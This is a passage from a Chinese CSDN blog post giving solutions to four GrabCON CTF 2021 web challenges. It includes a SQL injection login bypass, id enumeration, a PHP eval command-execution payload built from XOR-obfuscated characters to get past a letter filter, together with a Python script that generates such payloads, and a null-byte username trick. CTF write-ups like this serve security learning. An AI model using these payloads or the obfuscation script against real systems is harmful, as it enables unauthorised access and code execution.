GrabCON CTF 2021 Web

最新推荐文章于 2023-10-27 22:06:31 发布
最新推荐文章于 2023-10-27 22:06:31 发布
阅读量251 收藏
点赞数
分类专栏: # BUUCTF-Web 文章标签: CTF WEB安全 SQL注入 RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/120168485
版权

GrabCON CTF 2021 Web

E4sy Pe4sy

题目描述

  • Hack admin user!

解题思路

  • 找到登录处尝试利用万能密码进行登录,发现密码处存在万能密码登录 admin:admin' or 1=1#
  • 登录后即可拿到 FLAG

在这里插入图片描述

Door Lock

题目描述

  • The door is open to all! See who is behind the admin door??

解题思路

  • 注册账号后登录后台,注意到 http://34.135.171.18/profile/index.php?id=1460 后面跟着的 id,联想到题目描述,尝试爆破 id 的数值,在 id 数值为 1766 的页面中成功找到 FLAG

在这里插入图片描述

Basic Calc

题目描述

  • Ever used calc based on php?

解题思路

  • 题目给出部分源码
<h2>Welcome to da Basic Calc</h2>
<form action="/" method="POST">
    Enter da equation : <br>
    <input type="text" name="eq"><br>
</form>

<?php

if (isset($_POST["eq"])){
    
    $eq = $_POST["eq"];

    if(preg_match("/[A-Za-z`]+/",$eq)){
        die("BAD.");
    }
    echo "Result: ";
    eval("echo " . $eq . " ;");
}else{
  echo highlight_file('index.php',true);  
}

?>
  • 由于过滤掉了大小写字母无法直接执行命令,这里采用异或方式利用未被过滤的字符来获取字母从而绕过正则过滤
  • 先查看一下根目录下的文件
("system")("ls /")=(('3'^'@').('9'^'@').('3'^'@').('4'^'@').('8'^']').('2'^'_'))(('1'^']').('3'^'@').('^'^'~').'/')
  • 获取 FLAG
("system")("cat /flagggg.txt")=(('3'^'@').('9'^'@').('3'^'@').('4'^'@').('8'^']').('2'^'_'))(('8'^'[').('!'^'@').('4'^'@').('^'^'~').'/'.('8'^'^').('1'^']').('!'^'@').('8'^'_').('8'^'_').('8'^'_').('8'^'_').'.'.('4'^'@').('8'^'@').('4'^'@'))

在这里插入图片描述

  • 贴一下异或脚本
# string_code = ['system','ls /']
string_code = ['system','cat /flagggg.txt']
obfuscated_code = ""
charset = "1234567890!#$%&'()*+/^,-.:;<=>?@[]_{|}~"

for code in string_code:
    obfuscated = ""
    for i in code:
        is_found_obfuscated = False
        for j in charset:
            for k in charset:
                if ord(j)^ord(k) == ord(i):
                    is_found_obfuscated = True
                    obfuscated += ".('%s'^'%s')" % (j, k)
                    #print("XOR ="+chr(ord(j)^ord(k)))
                if is_found_obfuscated:
                    break
            if is_found_obfuscated:
                break
        if not is_found_obfuscated:
            obfuscated += ".'%s'" % i
    #print("(%s) = (%s)" % (code, obfuscated[1:]))
    obfuscated_code += "(%s)" % obfuscated[1:]
print(''.join(["(\"%s\")" % i for i in string_code]) + '=' + obfuscated_code)

Null Food Factory

题目描述

  • Prove your hacking skill to get admin panel.

解题思路

  • 依旧还是之前的SQL注入题目,尝试一些方法都没有效果后,注意到 NUll 字眼,搜索相关的SQL注入利用方式发现一种叫做 空字符 注入的方法,参考漏洞说明
  • 注册一个用户名为 admin%00 的用户,发现 admin 的密码更新成 ic8aGsk^bh

在这里插入图片描述

  • 用得到的密码进行登录 admin:ic8aGsk^bh,成功拿到 FLAG

在这里插入图片描述

H3rmesk1t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NSSCTF-SWPUCTF 2021 新生赛-web-wp
F1rstb100d
09-19 677
NSSCTF-SWPUCTF 2021 新生赛-web-wp
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
[红明谷CTF 2021]JavaWeb
Mrs_H的博客
04-08 2017
[红明谷CTF 2021]JavaWeb 一.前言 好像是已经很久不刷题了,因为最近一直在忙着复习高数和专业课,拿不出太多的时间来打CTF。但是这次也总算是找到了点时间,做道java的简单题来放松一下,不能总是学那些书本上的知识了,感觉学多了也会烦。 二.正文 这道题目上来就让我们访问/login目录,所以我们直接访问试试看。 服务器那边又让我们访问/json的路径,但是我们如果用post方法对服务器进行访问的话,服务器又会返回另外的结果。 这里的登陆失败,就表明我们需要进行身份验证,我们尝试输入一对用
卫生CTF 2021 Web
feng的博客
07-11 1396
前言 比赛是第二届全国卫生健康行业网络安全技能大赛,赛后借了个账号复现了一下Web题,整体偏简单叭,做到CMS那题的时候环境关了。 签到 f12,拿到flag。 easy_web1 f12发现There_is_no_flag_here.php,再f12提示本地访问: Client-ip:127.0.0.1 即可得到flag。 easy_web2 ctfshow上的原题,直接打了: ?shell=/???/????64 /???????? 然后base64解码即可。 super_hacker Via 头
[红明谷CTF 2021]EasyTP
Sk1y的博客
01-01 2448
[红明谷CTF 2021]EasyTP 文章目录[红明谷CTF 2021]EasyTP解题过程解法1:报错注入解法2:开堆叠写shell解法3:rogue-mysql-server参考链接 解题过程 打开容器 源码泄露/www.zip 下载下来,发现是thinkphp3.2.3的,找链子:ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链 (f5.pm) 注意在源码中,控制器中存在反序列化,以这个为入手点 在BUUCTF的环境中,database=test,password
网络安全CTFWeb基础
晓梦林的博客
09-21 7029
Web类的考试,在CTF比赛中十分常见。本人从计算机专业转网络安全发展,属于半路出家,一知半解,如有总结不到位的地方,欢迎交流分享。
[SWPUCTF 2021 新生赛]caidao
rev1ve的博客
03-05 1001
[SWPUCTF 2021 新生赛]caidao
NSSCTF题库[SWPUCTF 2021 新生赛]+部分新生赛签到题
热门推荐
J1ng_Hong的博客
10-27 1万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
Java安全-Java In CTF([红明谷CTF 2021]JavaWeb、[红明谷CTF 2021]JavaWeb
Love&Share
05-05 2234
文章目录[RoarCTF 2019]Easy Java[红明谷CTF 2021]JavaWeb [RoarCTF 2019]Easy Java 存在文件下载,尝试去读 WEB-INF/web.xml,get 传参发现一直失败 在 burp 中改为 post 传参,可以正常下载文件 只要再去读 class 文件即可 成功下载 class 放到 idea 中,拿到 flag [红明谷CTF 2021]JavaWeb 题目提示 /login 目录,访问提示 /json 访问 /json 跳回到 /lo.
[红明谷CTF 2021]JavaWeb buu刷题记录
weixin_51458899的博客
04-08 1775
映入眼帘的报错,然后搜一下知道是spring的洞 有个登录,然后提示json,又看到cookie cve-2020-11989 Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) - 腾讯安全玄武实验室 (tencent.com) Apache Shiro权限绕过漏洞分析(CVE-2020-11989) (qq.com) 参考这两篇,得出两种攻击方式 payload1: 双编码绕过 / -> %2f ->%25%32%66 payload2: 分号 使用payl
[SWPUCTF 2021 新生赛]gift_F12
wyxlsm的博客
02-18 883
直接F12 打开开发者界面。点击搜索 直接搜flag值。
绿城杯 CTF 2021 真题 (1).rar
12-07
绿城杯 CTF 2021 真题
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts-CTF-2021zer0pts CTF 2021和彩云分流:链接: 提取码:gZce
CTF-web学习大纲
最新发布
01-30
CTF-web学习大纲
利用fastcoll实现MD5碰撞
LYJ20010728的博客
03-07 2474
源码: <?php show_source(__FILE__); class CDUTSEC { public $var1; public $var2; function __construct($var1, $var2) { $var1 = $var1; $var2 = $var2; } function __destruct() { echo md5($this->var1);
[极客大挑战 2020]Greatphp
LYJ20010728的博客
05-31 1645
[极客大挑战 2020]Greatphp考点思路Payload 考点 PHP原生类利用、PHP反序列化、md5()和sha1()对类进行hash触发__toString方法 思路 进入题目,分析源码,题目绕过类型第一眼看上去在ctf的基础题目中非常常见,一般情况下只需要使用数组即可绕过,但是由于这里是在类里面,我们不能这么做 所以我们可以使用含有 __toString 方法的PHP内置类来绕过,用的两个比较多的内置类就是 Exception 和 Error ,他们之中有一个 __toString 方
HFCTF-2021-Final-easyflask
LYJ20010728的博客
05-31 1636
HFCTF-2021-Final-easyflask考点思路Payload 考点 Python os.path.join trick、环境变量暴露敏感信息、pickle 反序列化 RCE、Flask Session 伪造 思路 进入题目,hint提示/file?file=index.js,进去之后又提示Source at /app/source,获得源码信息 注意 /file 路由,用户上传的 path 会被拼接到 static 目录后面,这里有个trick,当 os.path.join 的第二个参
Exception类绕过md5、sha1等
LYJ20010728的博客
03-07 1290
源码: <?php show_source(__FILE__); class CDUTSEC { public $var1; public $var2; function __construct($var1, $var2) { $var1 = $var1; $var2 = $var2; } function __destruct() { echo md5($this->var1);
swpuctf 2021 新生赛]hardrce
07-28
- *1* *2* *3* [[SWPUCTF 2021 新生赛] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值